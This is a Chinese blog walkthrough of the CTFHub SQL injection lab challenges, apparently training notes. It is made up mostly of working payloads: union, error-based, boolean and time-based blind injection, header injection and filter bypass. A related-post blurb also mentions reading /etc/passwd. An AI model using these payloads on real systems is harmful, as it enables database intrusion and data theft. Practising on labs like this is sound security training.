CTFHUB-技能树-WEB-SQL注入

最新推荐文章于 2024-09-15 08:58:32 发布
最新推荐文章于 2024-09-15 08:58:32 发布
阅读量506 收藏 1
点赞数
分类专栏: CTF笔记 文章标签: mysql sql CTF CTFHUB 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54430466/article/details/115774025
版权

文章目录

1.整数型注入

?id=-1 order by 2 --+ true # 两个字段
?id=-1 order by 3 --+ false

?id=-1 union select 1,2 --+ --+ #说明存在两个显示位置,id=-1是为了将显示位置腾空,方便回显数据显示

id=-1 union select 1,group_concat(schema_name) from information_schema.schemata -- +  # 查询数据库

?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' -- + #查询数据表

id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' -- + #查询数据字段

id=-1 union select 1,(select flag from sqli.flag)-- + # 查询flag

2.字符型注入

?id=1' and '1'='1 true
?id=1' and '1'='2 flase  # 存在注入

?id=1' order by 2 -- + #存在两个字段
?id=-1' union select database(),user() -- + #当前数据库和用户名

?id=-1' union select 1,group_concat(schema_name) from information_schema.schemata -- + #数据库

?id=-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' -- + #数据表

?id=-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' -- + #查询列名

?id=-1' union select 1,group_concat(flag) from sqli.flag -- + #查询具体值

3.报错注入

?id=1  AND (updatexml(1,concat(0x5e24,(select database()),0x5e24),1)) -- + #查询当前数据库

?id=1  AND (updatexml(1,concat(0x5e24,(select group_concat(table_name) from information_schema.tables where table_schema='sqli'),0x5e24),1)) -- +  #查看表

?id=1  AND (updatexml(1,concat(0x5e24,(select group_concat(column_name) from information_schema.columns where table_name='flag'),0x5e24),1)) -- + #查看列

?id=1  AND (updatexml(1,concat(0x5e24,(select group_concat(flag) from sqli.flag),0x5e24),1)) -- + #查看值
ctfhub{0b5ac19a8d3f9241fa18ee7 但是不完整

?id=1  AND (updatexml(1,concat(0x5e24,(select mid(group_concat(flag),20,30) from sqli.flag),0x5e24),1)) -- +  #使用mid函数来调节显示的位置,慢慢读取flag

4.布尔注入

?id=1 and length(database())=4 -- + #判断数据库名长度为4

?id=1 and ascii(substr(database(), 1,1))>70 -- + #判断数据库名第一个字母的ascii码大于70,题目为's' 所以返回success!

?id=1 and substr(database(), 1,1)='s' -- + #直接判断数据库名第一个字母是's',返回success!

?id=1 and substr(database(), 2,1)='q' -- + # 猜测第二个是'q',逐个猜测即可。

?id=1 and substr(database(), 1,4)='sqli' -- + #database结果为sqli

id=1 and substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli' limit 0,1), 1,1)='n' -- + # 数据表名第一个为'n'

id=1 and substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli' limit 0,1), 1,4)='news' -- + 第一个数据表结果为'news'

?id=1 and substr((select table_name from information_schema.tables where table_schema='sqli' limit 1,1) ,1,4)='flag' -- + 第二个为flag

?id=1 and ascii(substr((select column_name from information_schema.columns where table_name='flag'),1,1))>110 -- + # 查处flag表中列名为flag

id=1 and ascii(substr((select * from sqli.flag where id=1),1,1))>110 #或者用下面的方式

?id=1 and substr((select flag from sqli.flag where id=1) ,1,1)='c' -- + #猜测第一个字母为c,直到猜出最终字符

5.时间盲注

步骤和布尔同理
?id=1 and if(substr(database(), 1,1)='s',sleep(5),1) -- + 猜测数据库名第一个字母
?id=1 and if(substr((select flag from sqli.flag where id=1) ,1,1)='c',sleep(5),1) -- +  #猜测目标字符串第一个字母为c,直到猜出最终字符

5.MYSQL结构

和第一、二种类似
?id=-1 union select database(),group_concat(schema_name) from information_schema.schemata  -- +    列出数据库

?id=-1 union select database(),group_concat(table_name) from information_schema.tables where table_schema='sqli'  -- + 列出数据表

?id=-1 union select database(),group_concat(column_name) from information_schema.columns where table_name='malbfjuabq'  -- + 列出字段

?id=-1 union select database(),group_concat(cvffvpkrwi) from sqli.malbfjuabq  -- + 列出flag

6.Cookie 注入

和前面类似
Cookie: id=1 order by 2 -- +

7.UA注入

和前面类似
User-Agent:1 order by 2 -- + Mozilla/5.0 (Macintosh; Inte...

8.Referer注入

和前面类似
referer:1 union select 1,2 -- x

9.过滤空格

?id=0/**/union/**/select/**/1,database()/**/#  查询数据库
?id=0/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'/**/# 查询数据表

?id=0/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='ssdfpmgfcc'/**/# 查询数据列,结果xrnmfbhzqk

?id=0/**/union/**/select/**/1,group_concat(xrnmfbhzqk)/**/from/**/sqli.ssdfpmgfcc/**/# 查询flag
青山别月
关注
专栏目录
CTFHub技能树_sql注入
m0_54525483的博客
06-14 298
Refer注入 burp suite抓包,添加headers 题目让我们加一个headers ,name为referer ,value为ID 可以看到有数据返回,接着我们测试 id=1 id=2 id=1+1 猜测此处的查询语句为 select x from xxxxx where id=(int) 为数值型注入 id=1’ 我们发现'原封不动的插入了,说明不用闭合其他字符,所以直接开始注入 order by 1 order by 2依次 order by 3的时候发现data没有返回值了 说明当前查询只
CTFHub 技能树SQL注入
滚滚是只小狐狸
03-05 1105
标题CTFHub 技能树SQL注入 进入CTFHub官网 一:SQL整数型注入 开题出现的界面是这样的,根据提示输入 1 后,出现两处回显,这里可以使用 工具注入也可以使用手工注入。 手工注入可以看一下这个博主写的查看手工注入 如果想了解工具的话就继续往下看吧☺ 我使用的是 kali 自带的 sqlmap 工具 1)因为一开始我们就已经知道存在注入点,于是这个步骤可有可无,但是还是可以看看数...
CTFHub~SQL注入超简单详细教程
weixin_67832625的博客
08-14 1032
本文主要是对CTFHub靶场的SQL注入做了详细的教程讲解,让练习者对SQL注入有更详细的了解和深入,如有什么问题,随时联系作者
CTFHUB技能树SQL注入
2401_82985722的博客
03-26 977
MySQL提供的 updatexml() 函数,当第二个参数包含特殊符号时会报错,并将第二个参数的内容显示在报错信息中。用group by(order by)判断查询列数,group by 2有回显 3无回显,证明字段数量为2列。修改2为version(),查看数据库版本,发现数据库版本为MariaDB 10.3.22。2-1回显与1一样,判断为数字型注入(不用考虑闭合符合)爆出flag数据表中的全部字段名,得到完整flag。2-1的回显界面与1不一样,判断为字符型注入。输入1时正常回显,输入1'时报错。
CTFHub——技能树——SQL注入sqlmap)
sparename的博客
12-26 7370
SQL注入整数型注入sqlmap简介检测注入实战解题字符型注入报错注入布尔盲注时间盲注MySQL结构Cookie注入UA注入Refer注入过滤空格 整数型注入 sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用u
2021-06-16ctfhub技能树SQL注入系列
qq_45290991的博客
06-16 416
CTFHub SQL技能树-整数形注入-字符型注入-报错注入-布尔盲注-时间盲注 整数型注入字符型注入报错注入布尔盲注时间盲注 整数型注入 首先输入1查看回显: 可以看到返回了SQL语句及ID和Data数据,查看列数: 1 order by 2...
CTFHUB-web-SQL注入
ookami6497的博客
11-29 844
CTFHUB SQL
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7262
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1255
CTFHUB-WEB-SQL注入
CTFHub-Web--信息泄露
m0_69003772的博客
04-23 1446
CTF简介以及信息泄露下题目解题过程 文章目录 前言 一、基础知识 1.CTF简介 2.竞赛模式 2.1.理论知识 2.2.Jeopardy-解题 2.3.AwD-攻防模式 2.4.AWP-攻防增强 2.5.RHG-自动化[ AI自动化] 2.6RW-真实世界 2.7.KoH-抢占山头 2.8.Mix[混合] 3.比赛形式 3.1.线上 3.2.线下 4.题目类型 4.1.Web 4.2.Pwn 4.3.Reverse 4.4.C.
二、CTF-Web-SQL注入(记录CTF学习)
qq_27920699的博客
12-16 456
个人CTF学习之路
CTFHub技能树-SQL注入-整数型注入
最新发布
m0_74313947的博客
09-15 454
思路:注入点->库->表->列->数据首先使用order by探测有几列我们发现order by 2 的时候有回显,到了order by 3 的时候就没有回显了,所以列数为2然后使用联合注入得到用户名与数据库名。
CTFHUB-技能树-Web题-SQL注入-整数型注入
Static______的博客
03-28 547
利用 group_concat() 函数进行查询连接所有的表名。还可以读取到 /etc/passwd 文件。load_file( )函数 读文件操作。1,2又有数值,说明两字段都有回显。由此判断存在两个字段。
CTFHub--技能树--SQL注入--字符型注入(kali SQLmap)
2402_82644071的博客
09-13 262
发现URL出现了改变,这下可以直接使用kali自带的SQLmap。得到表名flag和news,我们就去看flag表名下的列。1:打开kali ,输入我们的目标URL。1:打开配置环境看到。3:查看数据名下的表。
CTFhub 报错注入
plant1234的博客
06-16 242
报错注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata sc
CTFHUB技能树SQL注入整数型和字符型注入
zw1358978796的博客
03-02 464
这里写目录标题一整数型注入二字符型注入 一整数型注入 1在url地址栏中id属性後面添加 id =1 and 1=1 查看是否报错,添加后发现能正常访问,就将代码改为 id =1 and 1=2 添加代码后发现会出现报错,此时说明有sql注入点 直接进入第二步,查询字段使用: id=1 and 1=1 order by 1 id=1 and 1=1 order by 2 id=1 and 1=1 order by 3 将数值改到3时,发现报错,此时发现表中只有两个字段 进入第三步,使用sql语句
CTFhub技能树web-SQL注入
Mccc_li的博客
04-05 1255
1.数字型 1 and 1=1 正常输出 1 and 1=2 不输出 存在数字型注入,接下来猜字段 1 order by 1,2输出正常 1 order by 1,2,3不输出,所以有两个字段 1 and 1=2 union select 1,database(),看数据库名字 1,group_concat(table_name)from information_schema.table...
报错注入常见函数原理
p_utao的博客
11-04 682
floor函数 select count(*),(floor(rand(0)*2))x from table group by x; select查询语句 group by进行分组(相同为一组) rand()生成0到1的随机数 floor()返回整数 count()对数据整合(类似去重) 产生原因:mysql在执行该语句会建立一个虚拟表,表中有两个字段(一个是分组的值和一个计数的值),当分组已经存在后就会爆错。 参考:http://www.cnblogs.com/sfriend/p/11365999.ht
CTFHub_技能树_WebSQL注入——整数型注入
Ho1aAs‘s Blog
07-23 435
文章目录使用工具过程思维导图完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 SQLMAP Python3.6 过程 查询是基于sql指令,用SQLMAP注入 首先检查数据库有无注入点 D:\Python3.6.8\sqlmap>python sqlmap.py -u http://challenge-16c04c6e4ee7556d.sandbox.ctfhub.com:10080/?id=1 一直回车后,CMD返回了以下指令
ctfhub技能树web基础认证
03-13
CTFHub是一个CTF(Capture The Flag)竞赛平台,提供了丰富的技能树来帮助学习者提升Web基础认证的能力。下面是CTFHub技能树中关于Web基础认证的内容: 1. HTTP协议:了解HTTP协议的基本原理和常见的请求方法(GET...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值